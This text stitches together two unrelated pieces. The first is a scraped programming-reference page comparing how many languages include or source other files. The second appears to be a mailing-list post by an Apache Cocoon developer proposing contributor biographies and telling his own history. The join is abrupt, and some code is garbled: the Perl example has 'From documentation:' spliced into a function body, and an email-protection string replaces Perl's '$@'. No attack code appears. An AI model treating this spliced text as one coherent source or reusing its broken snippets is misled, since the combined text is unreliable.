Use an equal sign at the beginning of a line to include a file:
=util.inc
OCaml[edit]
In script mode and in the interactive loop (the toplevel) we can use:
#use "some_file.ml"
In compile mode (compiled to bytecode or compiled to native code) we can use:
include Name_of_a_module
Oforth[edit]
In order to load a file with name filename :
"filename" load
In order to load a package with name pack :
import: pack
ooRexx[edit]
ooRexx has a package system and no ability for textual inclusion of other text files. Importing of other packages is done via the ::requires directive.
::requires "regex.cls"
OpenEdge/Progress[edit]
Curly braces indicate that a file should be included. The file is searched across all PROPATH directory entries.
{file.i}
Arguments can be passed to the file being included:
{file.i SUPER}
Openscad[edit]
//Include and run the file foo.scad
include <foo.scad>;
//Import modules and functions, but do not execute
use <bar.scad>;
PARI/GP[edit]
Files can be loaded in GP with the
read, or directly in gp with the metacommand
\r.
PARI can use the standard C
#include, but note that if using gp2c the embedded
GP; commands must be in the original file.
Pascal[edit]
Perl[edit]
Here we include the file include.pl into our main program:
main.perl:
#!/usr/bin/perl
do "include.pl"; # Utilize source from another file
sayhello();
include.pl:
sub sayhello {From documentation:
print "Hello World!";
}
If "do" cannot read the file, it returns undef and sets $! to the error. If "do" can read the file but cannot compile it, it returns undef and sets an error message in [email protected] If the file is successfully compiled, "do" returns the value of the last expression evaluated.
Perl 6[edit]
Perl 6 provides a module system that is based primarily on importation of symbols rather than on inclusion of textual code:
use MyModule;
However, one can evaluate code from a file:
require 'myfile.p6';
One can even do that at compile time:
BEGIN require 'myfile.p6'
None of these are true inclusion, unless the require cheats and modifies the current input string of the parser. To get a true textual inclusion, one could define an unhygienic textual macro like this:
macro include(AST $file) { slurp $file.eval }
include('myfile.p6');
Phix[edit]
include arwen.ew
Phix also supports relative directory includes, for instance if you include "..\demo\arwen\arwen.ew" then anything that arwen.ew includes will be looked for in the appropriate directory.
PHP[edit]
There are different ways to do this in PHP. You can use a basic include:
include("file.php")
You can be safe about it and make sure it's not included more than once:
include_once("file.php")
You can crash the code at this point if the include fails for any reason by using require:
require("file.php")
And you can use the require statement, with the safe _once method:
require_once("file.php")
PicoLisp[edit]
The function 'load' is used for recursively executing the contents of files.
(load "file1.l" "file2.l" "file3.l")
PL/I[edit]
%include myfile;
PowerBASIC[edit]
Note that PowerBASIC has the optional modifier
ONCE which is meant to insure that no matter how many times the file may be included in code, it will only be inserted by the compiler once (the first time the compiler is told to include that particular file).
Note also that
#INCLUDE and
$INCLUDE function identically.
#INCLUDE "Win32API.inc"
#INCLUDE ONCE "Win32API.inc"
PowerShell[edit]
<#.
#>
Import-Module -Name MyModule
<#
When you dot source a script (or scriptblock), all variables and functions defined in the script (or scriptblock) will
persist in the shell when the script ends.
#>
. .\MyFunctions.ps1
Prolog[edit]
consult('filename').
PureBasic[edit]
IncludeFile will include the named source file at the current place in the code.
IncludeFile "Filename"
XIncludeFile is exactly the same except it avoids including the same file several times.
XIncludeFile "Filename"
IncludeBinary will include a named file of any type at the current place in the code. IncludeBinary don't have to, but should preferably be done inside a data block.
IncludeBinary "Filename"
Python[edit]
Python supports the use of execfile to allow code from arbitrary files to be executed from a program (without using its modules system).
import mymodule
includes the content of mymodule.py
Names in this module can be accessed as attributes:
mymodule.variable
R[edit]
source("filename.R")
Racket[edit]
Including files is usually discouraged in favor of using modules, but it is still possible:
#lang racket
(include "other-file.rkt")
RapidQ[edit]
$INCLUDE "RAPIDQ.INC"
Retro[edit]
include filename.ext
REXX[edit]
The REXX language does not include any directives to include source code from other files. A workaround is to use a preprocessor that take the source and the included modules and builds a temporary file containing all the necessary code, which then gets run by the interpreter.
Some variants of REXX may provide implementation specific solutions.
The REXX Compiler for CMS and TSO supports a directive to include program text before compiling the program
/*%INCLUDE member */
Including a file at time of execution[edit]
On the other hand, since REXX is a dynamic language, you can (mis)use some file IO and the INTERPRET statement to include another source file:
/* Include a file and INTERPRET it; this code uses ARexx file IO BIFs */
say 'This is a program running.'
if Open(other,'SYS:Rexxc/otherprogram.rexx','READ') then do
say "Now we opened a file with another chunk of code. Let's read it into a variable."
othercode=''
do until EOF(other)
othercode=othercode || ReadLn(other) || ';'
end
call Close(other)
say 'Now we run it as part of our program.'
interpret othercode
end
say 'The usual program resumes here.'
exit 0
Note: due to the way most REXX interpreters work, functions and jumps (SIGNALs) inside an INTERPRETED program won't work. Neither are labels recognized, which would then exclude the use of those subroutines/functions.
There are also other restrictions such as multi-line statements and comments (more than one line).
Another possibility of errors is the creation of an extremely long value which may exceed the limit for a particular REXX interpreter.
Calling an external program[edit]
Usually, including a file in another is not necessary with REXX, since any script can be called as a function:
Program1.rexx
/* This is program 1 */
say 'This is program 1 writing on standard output.'
call Program2
say 'Thank you, program 1 is now ending.'
exit 0
Program2.rexx
/* This is program 2 */
say 'This is program 2 writing on standard output.'
say 'We now return to the caller.'
return
If a REXX interpreter finds a function call, it first looks in the current program for a function or procedure by that name, then it looks in the standard function library (so you may replace the standard functions with your own versions inside a program), then it looks for a program by the same name in the standard paths. This means that including a file in your program is usually not necessary, unless you want them to share global variables.
RPG[edit]
// fully qualified syntax:
/include library/file,member
// most sensible; file found on *libl:
/include file,member
// shortest one, the same library and file:
/include member
// and alternative:
/copy library/file,member
//... farther like "include"
Ring[edit]
Load 'file.ring'
Ruby[edit]
Note that in Ruby, you don't use the file extension. Ruby will first check for a Ruby (.rb) file of the specified name and load it as a source file. If an .rb file is not found it will search for files in .so, .o, .dll or other shared-library formats and load them as Ruby extension.
require will search in a series of pre-determined folders, while
require_relative behaves the same way but searches in the current folder, or another specified folder.
require 'file'
Run BASIC[edit]
You don't use the file extension. .bas is assumed.
run SomeProgram.bas",#include ' this gives it a handle of #include
render #include ' render will RUN the program with handle #include
Rust[edit]
The compiler will include either a 'test.rs' or a 'test/mod.rs' (if the first one doesn't exist) file.
mod test
fn main() {
test::some_function();
}
Additionally, third-party libraries (called
crates in rust) can be declared thusly:
extern crate foo;
fn main() {
foo::some_function();
}
Scala[edit]
Some remarks are necessary here. Scala does not define how the source code is stored in files. The language rather talks about compilation units.
In a Scala REPL[1] it's possible to save and load source code.
Seed7[edit]
The Seed7 language is defined in the include file seed7_05.s7i. Therefore seed7_05.s7i must be included before other language features can be used (only comments can be used before). The first include directive (the one which includes seed7_05.s7i) is special and it must be introduced with the $ character.
$ include "seed7_05.s7i";
All following include directives don't need a $ to introduce them. The float.s7i library can be included with:
include "float.s7i";
Sidef[edit]
Include a file in the current namespace:
include 'file.sf';
Include a file as module (file must exists in SIDEF_INC as Some/Name.sm):
include Some::Name;
# variables are available here as: Some::Name::var_name
Smalltalk[edit]
there is no such thing as source-file inclusion in Smalltalk. However, in a REPL or anywhere in code, source code can be loaded with:
aFilename asFilename readStream fileIn
or:
Smalltalk fileIn: aFilename
In Smalltalk/X, which supports binary code loading, aFilename may either be sourcecode or a dll containing a precompiled class library.
SNOBOL4[edit]
-INCLUDE "path/to/filename.inc"
SPL[edit]
$include.txt
Standard ML[edit]
use "path/to/file";
Tcl[edit]
The built-in
source command does exactly inclusion of code into the currently executing scope, subject to minor requirements of being well-formed Tcl script that is sourced in the first place (and the ability to introspect via
info script):
source "foobar.tcl"
Note that it is more usually considered good practice to arrange code into packages that can be loaded in with more regular semantics (including version handling, only-once semantics, integration of code written in other languages such as C, etc.)
package require foobar 1.3
In the case of packages that are implemented using Tcl code, these will actually be incorporated into the program using the
source command, though this is formally an implementation detail of those packages.
UNIX Shell[edit]
With Bourne-compatible shells, the dot operator includes another file.
. myfile.sh # Include the contents of myfile.sh
C Shell[edit]
source myfile.csh
Bash[edit]
. myfile.sh
source myfile.sh
GNU Bash has both
. and the C-Shell style
source. See Bash manual on
source
Ursa[edit]
Ursa can read in and execute another file using the import statement, similar to Python.
import "filename.u"
Vala[edit]
Importing/including is done during compilation. For example, to compile the program called "maps.vala" with the package "gee":
valac maps.vala --pkg gee-1.0
Functions can be called then using Gee.<function> calls:
var map = new Gee.HashMap<string, int> ();
or with a using statement:
using Gee;
var map = new HashMap<string, int>();
VBScript[edit]
VBScript doesn't come with an explicit include (unless you use the wsf form). Fortunately vbscript has the Execute and ExecuteGlobal commands which allow you to add code dynamically into the local (disappears when the code goes out of scope) or global namespaces. Thus, all you have to do to include code from a file is read the file into memory and ExecuteGlobal on that code. Just pass the filename to this sub and all is golden. If you want an error to occur if the file is not found then just remove the FileExists test.
Include "D:\include\pad.vbs"
Wscript.Echo lpad(12,14,"-")
Sub Include (file)
dim fso: set fso = CreateObject("Scripting.FileSystemObject")
if fso.FileExists(file) then ExecuteGlobal fso.OpenTextFile(file).ReadAll
End Sub
If you use the wsf form you can include a file by
<script id="Connections" language="VBScript" src="D:\include\ConnectionStrings.vbs"/>
If you use the following form then you can define an environment variable, %INCLUDE% and make your include library more portable as in
Include "%INCLUDE%\StrFuncs.vbs"
Function Include ( ByVal file )
Dim wso: Set wso = CreateObject("Wscript.Shell")
Dim fso: Set fso = CreateObject("Scripting.FileSystemObject")
ExecuteGlobal(fso.OpenTextFile(wso.ExpandEnvironmentStrings(file)).ReadAll)
End Function
Verbexx[edit]
/*******************************************************************************
* /# @INCLUDE file:"filename.filetype"
* - file: is just the filename
* - actual full pathname is VERBEXX_INCLUDE_PATH\filename.filetype
* where VERBEXX_INCLUDE_PATH is the contents of an environment variable
*
* /# @INCLUDE file:"E:\xxx\xxx\xxx\filename.filetype"
* - file: specifies the complete pathname of file to include
*
* @INCLUDE verb can appear only in pre-processor code (after /# /{ etc.)
*******************************************************************************/
/{ //////////////////////////////////////////////// start of pre-processor code
@IF (@IS_VAR include_counter)
else:{@VAR include_counter global: = 0}; // global, so all code sees it
include_counter++;
@SAY " In pre-processor -- include counter = " include_counter;
@IF (include_counter < 3)
then:{@INCLUDE file:"rosetta\include_a_file.txt"}; // include self
}/ ////////////////////////////////////////////////// end of pre-processor code
@SAY "Not in pre-processor -- include_counter = " include_counter;
/]
Output: In preprocessor -- include_counter = 1
In preprocessor -- include_counter = 2
In preprocessor -- include_counter = 3
Not in preprocessor -- include_counter = 3
Not in preprocessor -- include_counter = 3
Not in preprocessor -- include_counter = 3
x86 Assembly[edit]
include 'MyFile.INC'
%include "MyFile.INC"
XPL0[edit]
include c:\cxpl\stdlib;
DateOut(0, GetDate)
- Output:
09-28-12
zkl[edit]
include(vm.h.zkl, compiler.h.zkl, zkl.h.zkl, opcode.h.zkl);
ZX Spectrum Basic[edit]
It is possible to include the contents of another program using the merge command. However, line numbers that coincide with those of the original program shall be overwritten, so it is best to reserve a block of line numbers for merged code:
10 GO TO 9950
5000 REM We reserve line numbers 5000 to 8999 for merged code
9000 STOP: REM In case our line numbers are wrong
9950 REM Merge in our module
9955 MERGE "MODULE"
9960 REM Jump to the merged code. Pray it has the right line numbers!
9965 GO TO 5000
- Programming Tasks
- Solutions by Programming Task
- 360 Assembly
- ACL2
- Ada
- ALGOL 68
- ALGOL 68G
- ALGOL 68RS
- ALGOL 68C
- AntLang
- Applesoft BASIC
- AutoHotkey
- AWK
- Axe
- BaCon
- BASIC
- Batch File
- BBC BASIC
- Bracmat
- ChucK
- C
- C++
- C sharp
- Clipper
- Clojure
- COBOL
- Common Lisp
- D
- Déjà Vu
- Delphi
- DWScript
- Emacs Lisp
- Erlang
- Euphoria
- Factor
- Forth
- Fortran
- FreeBASIC
- Furryscript
- FutureBasic
- Gambas
- GAP
- Gnuplot
- Harbour
- Haskell
- HTML
- Icon
- Unicon
- IWBASIC
- J
- Java
- JavaScript
- JQuery
- Node.js
- Jq
- Julia
- Kotlin
- LabVIEW
- Lasso
- Lingo
- Logtalk
- Lua
- M4
- Maple
- Mathematica
- Wolfram Language
- MATLAB
- Octave
- Maxima
- Modula-2
- Modula-3
- Nemerle
- NewLISP
- Nim
- OASYS Assembler
- OCaml
- Oforth
- OoRexx
- OpenEdge/Progress
- Openscad
- PARI/GP
- Pascal
- Perl
- Perl 6
- Phix
- PHP
- PicoLisp
- PL/I
- PowerBASIC
- PowerShell
- Prolog
- PureBasic
- Python
- R
- Racket
- RapidQ
- Retro
- REXX
- RPG
- Ring
- Ruby
- Run BASIC
- Rust
- Scala
- Seed7
- Sidef
- Smalltalk
- SNOBOL4
- SPL
- Standard ML
- Tcl
- UNIX Shell
- C Shell
- Bash
- Ursa
- Vala
- VBScript
- Verbexx
- X86 Assembly
- XPL0
- Zkl
- ZX Spectrum Basic
- F Sharp/Omit
- Go/Omit
- GUISS/Omit
- NetRexx/Omit
- Basic language learning
- Initialization | https://rosettacode.org/wiki/Include_a_file | CC-MAIN-2018-26 | refinedweb | 6,833 | 55.74 |
Python’s Innards: Interpreter Stacks
2010/07/22 § 4 Comments
Those of you who have been paying attention know that this series is spiraling towards what can be considered the core of Python’s Virtual Machine, the “actually do work function” ./Python/ceval.c: PyEval_EvalFrameEx. The (hopefully) last hurdle on our way there is to understand the three significant stack data structures used for CPython’s code evaluation: the call stack, the value stack and the block stack (I’ve called them collectively “Interpreter Stacks” in the title, this isn’t a formal term). All three stacks are tightly coupled with the frame object, which will also be discussed today. If you give me a minute to put on my spectacles, I’ll read to you what Wikipedia says about call stacks in general:
In computer science, a call stack is a stack data structure that stores information about the active subroutines of a computer program… A call stack is composed of stack frames (…). These are machine dependent data structures containing subroutine state information. Each stack frame corresponds to a call to a subroutine which has not yet terminated with a return. Hrmf. Jim, I don’t understand… how does this translate to a virtual machine?
Well, since CPython implements a virtual machine, its call stack and stack frames are dependant on this virtual machine, not on the physical machine it’s running on. And also, as Python tends to do, this internal implementation detail is exposed to Python code, either via the C-API or pure Python, as frame objects (./Include/frameobject.h: PyFrameObject). We know that code execution in CPython is really the evaluation (interpretation) of a code object, so every frame represents a currently-being-evaluated code object. We’ll see (and already saw before) that frame objects are linked to one another, thus forming a call stack of frames. Finally, inside each frame object in the call stack there’s a reference to two frame-specific stacks (not directly related to the call stack), they are the value stack and the block stack.
The value stack (you may know this term as an ‘evaluation stack’) is where manipulation of objects happens when object-manipulating opcodes are evaluated. We have seen the value stack before on various occasions, like in the introduction and during our discussion of namespaces. Recalling an example we used before, BINARY_SUBTRACT is an opcode that effectively pops the two top objects in the value stack, performs PyNumber_Subtract on them and sets the new top of the value stack to the result. Namespace related opcodes, like LOAD_FAST or STORE_GLOBAL, load values from a namespace to the stack or store values from the stack to a namespace. Each frame has a value stack of its own (this makes sense in several ways, possibly the most prominent is simplicity of implementation), we’ll see later where in the frame object the value stack is stored.
This leaves us with the block stack, a fairly simple concept with some vaguely defined terminology around it, so pay attention. Python has a notion called a code block, which we have discussed in the article about code objects and which is also explained here. Completely unrelatedly, Python also has a notion of compound statements, which are statements that contain other statements (the language reference defines compound statements here). Compound statements consist of one or more clauses, each made of a header and a suite. Even if the terminology wasn’t known to you until now, I expect this is all instinctively clear to you if you have almost any Python experience: for, try and while are a few compound statements.
So where’s the confusion? In various places throughout the code, a block (sometimes “frame block”, sometimes “basic block”) is used as a loose synonym for a clause or a suite, making it easier to confuse suites and clauses with what’s actually a code block or vice versa. Both the compilation code (./Python/compile.c) and the evaluation code (./Python/ceval.c) are aware of various suites and have (ill-named) data structures to deal with them; but since we’re more interested in evaluation in this series, we won’t discuss the compilation-related details much (or at all). Whenever I’ll think wording might get confusing, I’ll mention the formal terms of clause or suite alongside whatever code term we’re discussing.
With all this terminology in mind we can look at what’s contained in a frame object. Looking at the declaration of ./Include/frameobject.h: PyFrameObject, we find (comments were trimmed and edited for your viewing pleasure):
typedef struct _frame { PyObject_VAR_HEAD struct _frame *f_back; /* previous frame, or NULL */ PyCodeObject *f_code; /* code segment */ PyObject *f_builtins; /* builtin symbol table */ PyObject *f_globals; /* global symbol table */ PyObject *f_locals; /* local symbol table */ PyObject **f_valuestack; /* points after the last local */ PyObject **f_stacktop; /* current top of valuestack */ PyObject *f_trace; /* trace function */ /* used for swapping generator exceptions */ PyObject *f_exc_type, *f_exc_value, *f_exc_traceback; PyThreadState *f_tstate; /* call stack's thread state */ int f_lasti; /* last instruction if called */ int f_lineno; /* current line # (if tracing) */ int f_iblock; /* index in f_blockstack */ /* for try and loop blocks */ PyTryBlock f_blockstack[CO_MAXBLOCKS]; /* dynamically: locals, free vars, cells and valuestack */ PyObject *f_localsplus[1]; /* dynamic portion */ } PyFrameObject;
We see various fields used to store the state of this invocation of the code object as well as maintain the call stack’s structure. Both in the C-API and in Python these fields are all prefixed by f_, though not all the fields of the C structure PyFrameObject are exposed in the pythonic representation. I hope some of the fields are intuitively clear to you, since these fields relate to many topics we have already covered. We already mentioned the relation between frame and code objects, so the f_code field of every frame points to precisely one code object. Insofar as structure goes, frames point backwards thus that they create a stack (f_back) as well as point “root-wards” in the interpreter state/thread state/call stack structure by pointing to their thread state (f_tstate), as explained here. Finally, since you always execute Python code in the context of three namespaces (as discussed there), frames have the f_builtins, f_globals and f_locals fields to point to these namespaces. These are the fields (I hope) we already know.
Before we dig into the other fields of a frame object, please notice frames are a variable size Python object (they are a PyObject_VAR_HEAD). The reason is that when a frame object is created it should be dynamically allocated to be large enough to contain references (pointers, really) to the locals, cells and free variables used by its code object, as well as the value stack needed by the code objects ‘deepest’ branch. Indeed, the last field of the frame object, f_localsplus (locals plus cells plus free variables plus value stack…) is a dynamic array where all these references are stored. PyFrame_New will show you exactly how the size of this array is computed.
If the previous paragraph doesn’t sit well with you, I suggest you read the descriptions I wrote for co_nlocals, co_cellvars, co_freevars and co_stacksize – during evaluation, all these ‘dead’ parts of the inert code object come to ‘life’ in space allocated at the end of the frame. As we’ll probably see in the next article, when the frame is evaluated, these references at the end of the frame will be used to get (or set) “fast” local variables, free variables and cell variables, as well as to the variables on the value stack (“fast” locals was explained when we discussed namespaces). Looking back at the commented declaration above and given what I said here, I believe you should now understand f_valuestack, f_stacktop and f_localsplus.
We can now look at f_blockstack, keeping in mind the terminology clarification from before. As you can maybe imagine, compound statements sometimes require state to be evaluated. If we’re in a loop, we need to know where to go in case of a break or a continue. If we’re raising an exception, we need to know where is the innermost enclosing handler (the suite of the closest except header, in more formal terms). This state is stored in f_blockstack, a fixed size stack of PyTryBlock structures which keeps the current compound statement state for us (PyTryBlock is not just for try blocks; it has a b_type field to let it handle various types of compound statements’ suites). f_iblock is an offset to the last allocated PyTryBlock in the stack. If we need to bail out of the current “block” (that is, the current clause), we can pop the block stack and find the new offset in the bytecode from which we should resume evaluation in the popped PyTryBlock (look at its b_handler and b_level fields). A somewhat special case is a raised exception which exhausts the block stack without being caught, as you can imagine, in that case a handler will be sought in the block stack of the previous frames on the call stack.
All this should easily click into place now if you read three code snippets. First, look at this disassembly of a for statement (this would look strikingly similar for a try statement):
>>> def f(): ... for c in 'string': ... my_global_list.append(c) ... >>> diss(f) 2 0 SETUP_LOOP 27 (to 30) 3 LOAD_CONST 1 ('string') 6 GET_ITER >> 7 FOR_ITER 19 (to 29) 10 STORE_FAST 0 (c) 3 13 LOAD_GLOBAL 0 (my_global_list) 16 LOAD_ATTR 1 (append) 19 LOAD_FAST 0 (c) 22 CALL_FUNCTION 1 25 POP_TOP 26 JUMP_ABSOLUTE 7 >> 29 POP_BLOCK >> 30 LOAD_CONST 0 (None) 33 RETURN_VALUE >>>
Next, look at how the opcodes SETUP_LOOP and POP_BLOCK are implemented in ./Python/ceval.c. Notice that SETUP_LOOP and SETUP_EXCEPT or SETUP_FINALLY are rather similar, they all push a block matching the relevant suite unto the block stack, and they all utilize the same POP_BLOCK:
TARGET_WITH_IMPL(SETUP_LOOP, _setup_finally) TARGET_WITH_IMPL(SETUP_EXCEPT, _setup_finally) TARGET(SETUP_FINALLY) _setup_finally: PyFrame_BlockSetup(f, opcode, INSTR_OFFSET() + oparg, STACK_LEVEL()); DISPATCH(); TARGET(POP_BLOCK) { PyTryBlock *b = PyFrame_BlockPop(f); UNWIND_BLOCK(b); } DISPATCH();
Finally, look at the actual implementation of ./Object/frameobject.c: PyFrame_BlockSetup and ./Object/frameobject.c: PyFrame_BlockPop:
void PyFrame_BlockSetup(PyFrameObject *f, int type, int handler, int level) { PyTryBlock *b; if (f->f_iblock >= CO_MAXBLOCKS) Py_FatalError("XXX block stack overflow"); b = &f->f_blockstack[f->f_iblock++]; b->b_type = type; b->b_level = level; b->b_handler = handler; } PyTryBlock * PyFrame_BlockPop(PyFrameObject *f) { PyTryBlock *b; if (f->f_iblock <= 0) Py_FatalError("XXX block stack underflow"); b = &f->f_blockstack[--f->f_iblock]; return b; }
There, now you’re smart. If you keep the terminology straight, f_blockstack turns out to be rather simple, at least in my book.
We’re left with the rather esoteric fields, some simpler, some a bit more arcane. In the ‘simpler’ range we have f_lasti, an integer offset into the bytecode of the last instructions executed (initialized to -1, i.e., we didn’t execute any instruction yet). This index lets us iterate over the opcodes in the bytecode stream. Heading towards the ‘more arcane’ area we see f_trace and f_lineno. f_trace is a pointer to a tracing function (see sys.settrace; think implementation of a tracer or a debugger). f_lineno contains the line number of the line which caused the generation of the current opcode; it is valid only when tracing (otherwise use PyCode_Addr2Line). Last but not least, we have three exception fields (f_exc_type, f_exc_value and f_exc_traceback), which are rather particular to generators so we’ll discuss them when we discuss that beast (there’s a longer comment about these fields in ./Include/frameobject.h if you’re curious right now).
On a parting note, we can mention when frames are created. This happens in ./Objects/frameobject.c: PyFrame_New, usually called from ./Python/ceval.c: PyEval_EvalCodeEx (and ./Python/ceval.c: fast_function, a specialized optimization of PyEval_EvalCodeEx). Frame creation occurs whenever a code object should be evaluated, which is to say when a function is called, when a module is imported (the module’s top-level code is executed), whenever a class is defined, for every discrete command entered in the interactive interpreter, when the builtins eval or exec are used and when the -c switch is used (I didn’t absolutely verify this is a 100% exhaustive list, but it think it’s rather complete).
Looking at the list in the previous paragraph, you probably realized frames are created very often, so two optimizations are implemented to make frame creation fast: first, code objects have a field (co_zombieframe) which allows them to remain associated with a ‘zombie’ (dead, unused) frame object even when they’re not evaluated. If a code object was already evaluated once, chances are it will have a zombie frame ready to be reanimated by PyFrame_New and returned instead of a newly allocated frame (trading some memory to reduce the number of allocations). Second, allocated and entirely unused stack frames are kept in a special free-list (./Objects/frameobject.c: free_list), frames from this list will be used if possible, instead of actually allocating a brand new frame. This is all kindly commented in ./Objects/frameobject.c.
That’s it, I think. Oh, wait: if you’d like to play with frames in your interpreter, take a look at the inspect module, maybe especially this part of it. In gdb, I used a rather crude method to look at the call stack (I dereferenced the global variable interp_head and went on from there). There’s probably a better way, but I didn’t bother looking. Now that’s really it. In fact, I believe at last we covered enough material to analyze ./Python/ceval.c: PyEval_EvalFrameEx. Ladies and Gentlemen, we can read it. We have the technology.
But, alas, we’ll only do it in the next post, and who knows when that will arrive. And until it does, do good, avoid doing bad and keep clearing your mind. Siddhārtha Gautama said that, and I tend to think that if that particular bloke lived today he’d have some serious Python-Fu going for him, so heed his words.
I would like to thank Nick Coghlan for reviewing this article; any mistakes that slipped through are my own. | http://tech.blog.aknin.name/tag/block-stack/ | CC-MAIN-2015-06 | refinedweb | 2,356 | 55.47 |
The Apache spirit is all about communities.
But communities are hard to build, hard to maintain and hard to
recognize.
A short story: when I first entered the Apache world, I was scared to
death by the *mythical* flame-rate on "new-httpd" (the list where the
Apache HTTPD project was born and was developpped), so much so that I
*never* ever wrote a single email on that list.
It was Ed Korthof that was telling us how "safe and easy" was to live
into JServ-land, compared to new-httpd land.
But it was sad for Jon, Pier and I to see all the *recognized* people
taking a picture together at the first ApacheCON, holding the feather,
and we, working on the "sister-project" java.apache.org, just left
aside, ignored.
Oh, don't get me wrong: we didn't deserve to be on that picture.
Absolutely not! we *were* a simple sister project. JServ wasn't even a
released project at that time (1998), there was no java recognition for
servlets (the first JSDK was released in 1997), no J2EE, no .com
marketing stuff from Sun.
It it wasn't for Brian Behlendorf who was subscribed to the jserv mail
list (not even hosted on apache.org servers at that time!) and was
watching over us, I would not be here preaching to the converted.
Just like the original Apache tribes, "communication" between the
experienced and the unexperienced passes the *spirit* along.
I was afraid of new-httpd because I didn't know it. I didn't know the
people there, I just imagined they were gurus and I was a stupid
22-years-old geek trying to run a stupid servlet!
Why am I telling you this?
I have the sensation that some of you silent lurkers might want to say
something, stand up and share your sensations, but you are afraid of
doing so because you don't know us. You don't know how similar we are
with you all.
*we* can be used for "Apache Members" or "Cocoon Active Developers" or
"recognized open source people", up to you.
So, if these short BIO's might seem as a ego showoff, on the other hand
are a foundation, a *context* where you place the a name in order to
picture him/her closer to your world.
I met many people from the Apache world, but not so many from this list
and I find out that even *I* need these BIOs to get a better sense of
resonation with you guys.
In the past, I avoided giving information on myself to the public
because I found it shamefull to use this list as a way to show off, but
now I feel that it might be useful to remove the sense of *myth* and
fear that this lack of info surrounded me.
So you'll find my short BIO down below and I also propose to make this a
requirement: every active developer needs to be listed on the web, along
with his self-written BIO and a small (possibly funny!) picture of him.
This wants to remove the feeling of "guru-ness" that might surround us,
making it obvious that we are not that different from any of you and you
just need to volunteer some of your energy to be an active part of this
community.
What do you think?
Anyway, here we go:
- o -
My not-so-short BIO
-------------------
I was born on January 20, 1975 in Pavia, Italy, small town 35Km south of
Milano (northern part of italy).
I wrote my first computer program at the age of 7 on my first computer,
a Commodore VIC-20: it calculated the areas of simple poligons and the
volumes of simple solids. Unfortunately, there was no italian
translation of more in-depth books, so even if I knew what machine
language was, I never had the chance to use it on my commodore machines
(later I got a C-64, but still programming with BASIC only, so I moved
away).
I moved to Lego, which was more fun. I believe that I owe 40% of my
intellectual capabilities to those magic plastic pieces. In fact, I
still have all of them (and even bought new ones over the years! more on
this later)
Then my uncle bought a Amstrad 8086 with VGA. I learned DOS the hard
way: by typing each and every command (still didn't know english at that
time, having learned french in middle school). Typing HDFormat replied:
"this will erase all the content of the disk. Are you sure? [Y/N]".
After pressing Y I also had to learn how to install an operating system
in a few hours :)
Anyway, I moved to highschool and learned my first english and my first
Pascal. Both weren't really appreciated at first, but became important
later on. Again, having learned how to write thousands lines of basic
code on Commodore BASIC and Microsoft GWBasic (raster graphics, yes!),
GOTO was my second best friend. I cried its death a long time, but it
showed me something:
"if a computer language doesn't change the way you think about
programming, it's not worth knowing"
This was my first email signature. Look up yourself who wrote it.
Italian high school was hard and not that interesting, so I decided to
shake my life a little: I signed up for the exchange-student program at
the age of 16 and happened to be choosen to attend my senior year at the
Siuslaw High School of I landed in Florence, Or, U.S.A. where I became
sort of a legend because I was student of the month *and* playing
varsity football *and* basketball.
That was a fun year: it changed my english skills a lot and opened my
mind a lot.
Also, got my first impact with C: the regular computer-science classes
were boring and incredibly easy (on Borland Turbo Pascal) so, with other
two kids, they created a special "advanced" computer-science class where
we could do whatever we wanted. In short: they gave us the computers to
play with.
It was 1991 and I wrote my first 3d game using Pascal and Borland BGI
(slow as hell, but still didn't know assembly!): you were a mouse and
you had to escape a maze. At the same time, ID Software was working on
Wolfenstein 3D.
Graduation. Back to italy. Another year to finish italian high school
(we have five years, not four). Another graduation. Then college.
I choose to remain at the university of Pavia because it was easier for
everybody and I took Electronic Engineering.
It was 1992. That year, another two guys arrived in Pavia to go to
college: Pierpaolo Fumagalli and Federico Barbieri. I met Federico
because one of my best friends introduced me to him as "the guy who
could prove the mythical prof. XYZ wrong in front of the class", but our
streets didn'c cross until next year.
1993. Virtual Reality is still the hype, doom is the game, I started
searching on 3D algorithms and designed a data-glove with force
feedback. Met Federico again and he told me he was designing a
data-glove with force feedback. It was instant resonance: since that
day, we spent almost two years doing stuff together.
Federico and Pier were living in the same building, so I met Pierpaolo
(who had moved into Milano's DSI that year) and met Linux for the first
time.
Along with another guy, Fabrizio (who might see in the future around
Apache since he's doing his thesis on AOP!), we started "Beta Version
Productions" and we started preparing a demo for finnish "Assembly", the
*best* show on the demo scene ever.
Federico and Pier introduced me into x86 assembly and together we wrote
a pure-assembly 3D engine on our 486 66Mhz. We impressed out friends
(and our girlfriends) with flying and rotating shaded objects and also
moving stereograms.
Also, Fabrizio and I also spent some 6 months implementing a
psycoacustic model for spatial sound rendering but found out it nearly
impossible to do a general model for everybody's ear.
It was around 1996 when the 3D hardware accelerators hit massmarket and
killed any serious effort in the demo scene: we were far from releasing
our demo, but knew we didn't have any hope to survive the hardware
capabilities of those graphic cards.
It was a disaster for us: everything we had invested was vanishing
quickly and we had to turn into something else. Pier suggested Linux. I
suggested Java.
In 1997, we got a contract with a friend of Pier's to build a small
commercial web application: we decided to use servlets. It turned out to
be a very bad choice for that particular project, but a great choice for
our future.
Federico was writing the servlets, Pier the graphics and installing the
system, I was doing the glue. And JServ 0.9.7 sucked.
The rest is history: I started patching JServ in 1997, then got involved
in the community and proposed significant changes to the codebase that
made me release coordinator for JServ 1.0. Here, Brian invited me to
ApacheCON 98 and Pier followed me: we made two speeches.
In one of those speeches, I met Eric Prud'hommeaux ([email protected]) [sorry
for the probable mispelling of your last name, dude, but I can't look it
up right now since I'm offline] who introduced me into the fantastic
world of XML and RDF. It was October 1998. The real thing that shocked
me, back then, was the concept of "namespaces" they were yet to
formalize. But it was still nothing useful in my technological vision so
I placed it aside.
Before coming back, we joined Jon and Brian at Sun to talk about their
donation of the JSDK to Apache. It was the first metting between Apache
and Sun, the name of the meeting room was "jakarta" :)
On the way back, Pier and I had the concept of "mailets", then, back
home, proposed the creation of the JAMES project and proposed to the
servlet expert group (lead by James Davidson at that time) the extension
of the Servlet API into the mail world. They rejected the concept but
the JAMES project was started written by Federico with some help from
us.
But writing another java server, we understood that many things were
always the same and could be reused: we spent 6 months on our
whiteboards to come up with something that later became known as
"Avalon".
The year later, 1999, java.apache.org grew from being the home of JServ
to a full repository of many different projects.
Jon, Pier and I were proposed for ASF membership for our work on
java.apache.org and accepted.
Also, Jon and I wrote the scripts that generated the web site out of CVS
respositories automatically, but needed something better. I printed out
the XML and the XSL spec and when to the alps for XMas with my
girlfriend. I couldn't sleep and started reading those specs, then I got
the idea of server side pipelines of filtering components passing XML.
The TV was showing the movie Cocoon.
If you are reading this, you probably know the rest so let's cut the
crap :)
